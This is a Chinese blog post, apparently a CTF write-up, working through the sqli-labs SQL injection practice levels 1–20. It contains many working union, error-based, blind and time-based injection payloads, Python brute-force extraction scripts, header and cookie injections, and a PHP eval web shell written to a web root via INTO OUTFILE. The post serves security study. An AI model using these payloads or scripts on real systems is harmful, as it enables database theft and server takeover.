sqlilabs less1-20

最新推荐文章于 2024-03-21 09:47:50 发布
最新推荐文章于 2024-03-21 09:47:50 发布
阅读量505 收藏 2
点赞数 1
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53755216/article/details/115593009
版权

文章目录

说明

突然发现buuctf上可以直接做sqllibs 有点意思!
最近开始刷sqllibs!!!

less1

从第一题开始
首先从最简单的入手

?id=1'

回显

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

再试下?id=1" 发现正常

?id=1' order by 4%23

报错 说明查询应该有三列

-1' union select 1,2,3%23

回显 2,3
所以接着爆库

-1' union select 1,database(),3%23

爆出security

-1' union select 1,version(),3%23

爆出数据库版本 10.2.26-MariaDB-log

-1' union select 1,group_concat(schema_name),3 from information_schema.schemata%23
-1' union selcet 1,group_concat(table_name),3 from information_schema.tables%23
-1' union select 1,group_concat(column_name),3 from information_schema.columns%23

?id=-1' union select 1,group_concat(column),3 from information_schema.columns where table_schema='ctftraining' and table_name = 'flag'%23

拿到flag

?id=-1' union select 1, group_concat(flag) ,3 from ctftraining.flag%23

sqlmap学习一下
在这里插入图片描述

less2

-1 union select 1,group_concat(flag),3 from ctftraining.flag%23

less3

$sql = "select * from users where id = ('$id') limit 0,1"

输入1'
看一下报错

check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

select * from users where id = ('1') order by 4%23') limit 0,1

之后就一模一样了
不知为何上面的报错极其诡异

less4

试一下1"
报错

the right syntax to use near '"1"") LIMIT 0,1' at line 1

把上一题的pyload改为 1") ....即可

less5

随便试一试
发现出不来结果了 要开始盲注了!
那就开始吧!

1' and length(database())>8%23

出不来了!
所以判断数据库长度为8

1' and substr(database(),1,1) = 'a'%23

1' and substr((select table_name from information_schema.tables where table_schema = 'ctftraining' limit 0,1),1,1)= 'e'#

手工真的是麻烦。。。
等下贴个脚本

import requests

def determine(text):
    if 'You are' in text:
        return 1
    else:
        return 0


url = "http://95e07679-ca7b-4f20-a702-b6ba38e85ad7.node3.buuoj.cn/Less-5/"

#破解数据库名称
print('---------数据库名---------')
databasename=''

aph = "abcdefghijklmnopqrstuvwxyz"
for i in range(8):
    for j in aph:
        payload = "?id=1' and substr(database(),{},1)='{}'%23".format(i+1,j)
        s = url + payload
        r = requests.get(s)
        if determine(r.text) == 1 :
            databasename += j
            break
print(databasename)

tablename = ""
for i in range(10):
    for j in aph:
        payload = "?id=1' and substr((select table_name from information_schema.tables where table_schema = 'ctftraining' limit 0,1),{},1)='{}'%23".format(i + 1, j)
        s = url + payload
        r = requests.get(s)
        if determine(r.text) == 1 :
            tablename += j
            break
print(tablename)

less6

sqlmap一下看到有两种。。。接下来为了练习· 纯手工

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=1" AND 4328=4328#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1" AND (SELECT 3689 FROM(SELECT COUNT(*),CONCAT(0x717a626b71,(SELECT (ELT(3689=3689,1))),0x717a767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mUPM

?id=1" and length(database())>8%23

和上题一样?
貌似只是单引号变双

less7

题目都说了要用outfile
sqlmap找到注入点

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 6962=6962 AND ('SJWP'='SJWP

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1') AND (SELECT 9272 FROM (SELECT(SLEEP(5)))TRrJ) AND ('NgRV'='NgRV

接下来来脱裤
爆出有哪些数据库

import requests

def determine(text):
    if 'You are' in text:
        return 1
    else:
        return 0

url = "http://f5ce892b-71b8-4a78-ac72-7b6d422c73b9.challenge.ctf.show:8080/"


aph = "abcdefghijklmnopqrstuvwxyz"
schemas = ""
for i in range(100):
    for j in aph:
        payload = "?id=1') AND substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}' AND ('SJWP'='SJWP".format(i + 1, j)
        s = url + payload
        r = requests.get(s)
        if determine(r.text) == 1 :
            schemas += j
            print(schemas)
            break

for i in range(100):
    for j in aph:
        payload = "?id=1') AND substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),{},1)='{}' AND ('SJWP'='SJWP".format(i + 1, j)
        s = url + payload
        r = requests.get(s)
        if determine(r.text) == 1 :
            schemas += j
            print(schemas)
            break

emmm 稍微改一下 就OK啦
到这里突然发现自己写的脚本极其垃圾。。。大写变小写 下划线 出不来。。。
彻底整改!!!

import requests

def determine(text):
    if 'You are' in text:
        return 1
    else:
        return 0

url = "http://68c4cbfa-6d9e-4ba1-8b45-6ccf70df6a39.challenge.ctf.show:8080/"



schemas = ""
for i in range(100):
    for j in range(65,123):
        payload = "?id=1') AND ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),{},1))={} AND ('SJWP'='SJWP".format(i + 1, j)
        s = url + payload
        r = requests.get(s)

        if determine(r.text) == 1 :
            schemas += chr(j)
            print(schemas)
            break

好多了。。。但是貌似FLAG_COLUMN为空。。。
问题又回到了 outfile
往服务器写shell?
所以之前白忙活了(也不算 改进了脚本
outfile的用法

select 'shell' into outfile 'path'

emm 往哪写。。

/var/www/html/1.php

试一下

http://68c4cbfa-6d9e-4ba1-8b45-6ccf70df6a39.challenge.ctf.show:8080/?id=1') AND select '<?php eval($POST_[cmd]); ?>' into outfile 'C:\\var\www\html\1.php' AND ('SJWP'='SJWP

不知为何 死都写不进去
好像是不能在这里执行语句?
应该是 AND 与 AND 中间只能进行判断
换种思路 观察到了 右边应该还有一个来进行闭合 所以何以考虑union注入
猜想应该可以了

?id=1'))  union select '<?php eval($POST_[cmd]); ?>' into outfile 'C:\\var\www\html\1.php'%23

测试一下

?id=1'))  union select 1,2,3%23

可以跑的通 so 稍微改进一下

?id=1'))  union select 1,2, '<?php eval($POST_[cmd]); ?>' into outfile '/tmp/1.php' %23

应该是路径有问题 fuck
或许我应该来查找一下题目的路径?
在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL。并且无法用sql语句对其进行修改

突然发现 tmd 写进去了 但是 会报错。。。日

?id=1'))  UNION SELECT 1,2,'<?php eval($_POST[cmd]);?>' into outfile "/var/www/html/4.php";--+

less8

垃圾sqlmap连注入点都没给我跑出来
简单试了一下

?id=1' union select 1,2,3--+

呃 和普通的盲注没任何其区别呀。。。
接下来就不多说了。。咳咳

less9

简单trytry

?id=1' AND if(length(database())>9,sleep(5),1)%23

sqlmap要指定 technique -T 才能出来payload

Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 3399 FROM (SELECT(SLEEP(5)))AtVH) AND 'QcJu'='QcJu

接下来就开始搞脚本吧!

思路

if(substr(database(),1,1)='s',sleep(5),1)

schemas = ""
for i in range(100):
    for j in range(65,123):
        payload = "?id=1' AND if( ord( substr(database(),{},1) ) = {} ,sleep(3),1)%23".format(i+1,j)
        s = url + payload
        print(s)
        r = requests.get(s)
        if(r.elapsed.seconds) >= 2:
            schemas += chr(j)
            print(schemas)
            break

行倒是行 就是太慢。。。
还容易出错。。。(网络问题
好想会多线程。。。
那就去学。。。

看了salmap运行 猜测sqlmap多线程原理:
先判断需要爆破的长度:
再创造出与之数量对应的线程数?
yes

爆列名 FLAG_COLUMN

tables = ""
for i in range(0,8):
    for j in range(65,123):
        payload = "?id=1' AND if( ord( substr( (select column_name from information_schema.columns where table_schema = 'ctftraining' and table_name = 'FLAG_TABLE' limit 0,1), {},1   )   ) = {} ,sleep(5),1)%23".format(i+1,j)
        s = url + payload
        r = requests.get(s)
        if(r.elapsed.seconds) >= 4:
            tables += chr(j)
            print(tables)
            break

less11

太简单了。。。

less12

试一下最常用的

") and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

接下来就so easy啦

less17

UPDATE 表名称 SET 列名称 = 新值 WHERE 列名称 = 某值

update的注入 想了又想 可以在后面直接进行拼接??

update xxx set password = "123456" where username = "admin"

加上

update xxx set password = "123456" where username = "admin" or 1=1#

那么payload应该长这样

username = " or 1=1#
password = 123456

然而并不行。。。
可恶啊

emmm 换种思路
我们搞password

123456" AND 1=1#

try

1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

emmmm 结果。。。

Data too long for column 'password' at row 8

哎 好像有回显了
再try

1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

ok了
开心
注意 要输入一个正确的用户名才会有回显 不然啥都出不来

less18

可以看出他会把我们的 User Agent 给存下来 然后返回给我们
用了个 sqlmap 结果没成功。。。
估计是 insert
那么 尝试闭合一下 然后直接报错注入? 可

")and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

emmm不行
回想一下

INSERT INTO 表名称 VALUES (值1, 值2,…)
首先得把)闭合了
试一下堆叠注入
emmm 还是不行。。。吐了 问题出在哪呢

");updatexml(1,concat(0x7e,(select database()),0x7e),1)#

可能是思路不对。。。注入点
看一下有几个value。。。

1')%23

额 刚才太急了 现在来分析一下下

check the manual that corresponds to your MariaDB server version for the right syntax to use near '%23', '120.36.51.124', 'admin')' at line 1<br>

终于成功了。。。

1' or updatexml(1,concat(0x7e,database()),0) or '

values( '1 ' or updatexml(1,concat(0x7e,database()),0) or ' ', '120.36.51.124', 'admin')

有趣

less19

和上题一样 换在refer就行了

less20

和上两题不太一样
似乎没有了回显
所以 要好好想想怎么日
sqlmap没跑出来 (可能是我太菜不会用。。。
cao 凭什么buuctf上的less20 就没有回显
ctfshow上的就有回显。。。

在这里插入图片描述
很好 开始分析
emmm 首先他把uname记录了下来 user-agent应该也被存了起来
先试一下 ua头能不能注

直接改ua头 发现永远返回 I love your cookie 有点恶心。。。
突然发现 有两个包 而第二个包应该是决定返回值的!

GET /index.php HTTP/1.1
Host: dbf27bb7-6115-41e0-a267-4b0ef8d362d0.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://burpsuite/
Connection: close
Cookie: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin
Upgrade-Insecure-Requests: 1

而这里的cookie带了一个 uname。怪不得sql什么都没跑出来 少给了一个包。。。
这次试一下改第二个包里的ua头
试了一下 这次ua头好像注不了了
so cookie尝试。。。
改一下cookie 发现开始报错了 有戏

Cookie: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin'

结束战斗

Cookie: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin'+and+updatexml(1,concat(0x7e,(select database()),0x7e),1)+and+'

找到sqlmap的正确打开方式了

Parameter: uname (Cookie)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin' AND 8192=8192 AND 'nKOx'='nKOx

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin' AND (SELECT 5017 FROM(SELECT COUNT(*),CONCAT(0x71787a6271,(SELECT (ELT(5017=5017,1))),0x716a6a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MBUd'='MBUd

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin' OR SLEEP(5) AND 'oQjC'='oQjC

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=-8022' UNION ALL SELECT NULL,NULL,CONCAT(0x71787a6271,0x4662706a53565a626e576354526f686b44586c635746476e6a784864516e6b48556843596a4e476a,0x716a6a7071)-- -

直接可以爆出来所有信息

less21

b1ue0cean
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF-sqli-labs1
Nothing-one的博客
07-16 1573
根据题目内容他让我们(请输入id作为带数值的参数 )这个为数字型注入。 这里面我用了sqlmap工具来进行解题。 在里面输入 python sqlmap.py -u +(网站名)(记住在网站名后面要加入?id=1) --dbs #获取数据库 这样我们就可以获得数据库中的名称了。 下面我们就要看数据库中的表明了。 python sqlmap.py -u +(网站名) -D 数据库名 --tables #列出表名 我们知道了表名,下面我们就要爆出字段名。 python sqlmap.py -u +(网站名)
Sqli-Labs(1-10)通关笔记
weixin_54894046的博客
04-02 4504
靶场环境 buuctf的靶场 来到第一关 根据提示:提交方式GET 有报错提示 闭合方式为单引号 源码的sql语句为 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 使用?id=1传参 不要问我为啥这样写 我也不知道 依次使用?id=2,3,4,5,6.....不知道这关要干嘛QAQ 目标:得到数据库名字 表名 字段名 数据 输入?id=1'%23 原理用自己添加的单引号闭合 然后用#注释掉后面的单引号 不过#要用url编码成%
BUUCTF/sqli-labs 1-23关
weixin_44041994的博客
03-21 1013
因为#号后面都被注释了。这关输入正确用户名密码后,页面显示的不再是User-Agent,而是变成了Refer,我们通过抓包更改Refer,发现和18关差不多,只不过18关有3个参数,而19关只有两个参数。上面提示让我们使用outfile,outfile是sql的语法,可以通过into outfile命令,将查询到的结果写入目标路径,在知道目标系统的绝对路径时可以使用,如。这关通过测试,发现无论sql语句正确与否,返回的信息都是一样的,这样就不符合布尔注入的前提了,布尔盲注只适用于正确与错误结果不同的情况。
注入攻击(一)--------SQL注入(结合BUUCTF sqli-labs)
Young12138的博客
05-10 1926
为了准备信息安全技术课程汇报做的笔记,想着做了也是做了,不如分享出来给想我一样的初学者学习。本人之前没有做过CTF,也没有学过SQL注入,零基础,所以大佬可以先行离开。内容是SQL注入XPath注入HTML注入
BUUCTF basic BUU CODE REVIEW 1&sqli-labs &BUU UPLOAD COURSE 1
网安小趴菜
08-26 1074
BUUCTF basic BUU CODE REVIEW 1&sqli-labs&BUU UPLOAD COURSE 1 wp
buuctfsqli-labs靶场的36关,(宽字节注入)
DMXA的博客
10-07 279
【代码】buuctfsqli-labs靶场的36关,(宽字节注入)
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
- 示例 URL:`http://sql-lasb-master:8088/Less-1/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--+` 4. **爆出字段名*...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
SQLi-LABS Page-1(Basic Challenges)
07-24
在这个挑战中,从Less-1到Less-5,每一关都涉及不同的注入点和策略。例如: 1. **Less-1** 是一个基础的SQL注入实例,它展示了如何利用单引号来触发错误并揭示SQL结构。通过观察错误信息,学习者可以识别注入点并...
SQLi-LABS Page-1(Basic Challenges)1-22关
05-18
sqli-labs-master:7878/Less-1/?id=-1'order by 3--+ ``` 如果页面正常显示,则表示该表至少有三列;如果页面显示错误,则说明少于三列。 **步骤2:获取数据库名称** 利用`union select`语句来提取数据库名称。示例...
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
Sqli-Labs~1 详解
Cy610610的博客
12-04 1280
sqli-labs第一关,手把手教学,包学包会!内含informations_schema数据库解释说明等相关内容
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs buuctf平台+本地环境 全关全解 不是很详解(<_<)
weixin_48083470的博客
07-12 1908
sqli-labs 在buuctf平台 搜索sqli-labs 可以更加模拟线上赛的环境 less-1 less-5 ?id=0' and(select extractvalue(1,concat('~',(select database())))) %23 报错注入详细讲解:https://blog.csdn.net/silence1_/article/details/90812612 less-6 发现不报错了,用布尔盲注 写python代码来跑出内容 import requests url
SQLi-LABS(1~10关详解)
CTF小白的博客
09-22 6500
目录SQLi-LABS Less-1查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-2查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-3查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-4查看题目环境测试...
BUUCTF】web sqli-labs 1(sql注入)
weixin_45844670的博客
10-12 1844
查询闭合 http://54250e8c-3b6c-4a66-8079-9beb8d389458.node3.buuoj.cn/Less-1/?id=0' 查询数据库 http://54250e8c-3b6c-4a66-8079-9beb8d389458.node3.buuoj.cn/Less-1/?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata -- a 查询表名 http://54250e
buuctf---sqli-labs靶场,两种报错注入的方式(XPATH型和主键重复型)
DMXA的博客
10-07 263
【代码】buuctf---sqli-labs靶场,两种报错注入的方式(XPATH型和主键重复型)
【网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6404
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
Less 15-16(POST布尔注入)
老司机开代码的博客
08-03 365
文章目录1. 题目分析2. 注入过程less-16 1. 题目分析 首先分析页面,发现网站此时完全规避了报错信息。连双注入都不会再由报错信息提示到页面上。因此,我们无法通过报错的信息来获取网站的数据库信息。这是我们只能换一种思路—盲注。 通过多次尝试,我们发现,网站有两种响应状态,分别是successfully和failed。 那么我们可以知道,当条件语句为true的时候,就会返回successf...
sqli-labs less-1
最新发布
08-07
"Less-1"是SQL注入实验室(sqli-labs.com)中的一个挑战任务,它是针对Web应用程序安全训练的一种常见练习,特别是针对SQL注入攻击的学习。在这个特定的实验中,用户通常需要通过提交恶意SQL查询来绕过网站的安全防护机制,比如输入验证不足的表单。 "Less-1"的目标可能是让你了解如何构造精心设计的SQL语句,它们既能利用系统提供的漏洞,又能避开简单的过滤规则,获取数据库中的信息。它旨在提升防御者对SQL注入攻击的认识,并教授基本的渗透测试技巧。 要完成这个挑战,你需要理解: 1. SQL的基本语法和结构。 2. Web应用服务器的工作原理和数据传递过程。 3. 输入验证在防止SQL注入中的作用以及其局限性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值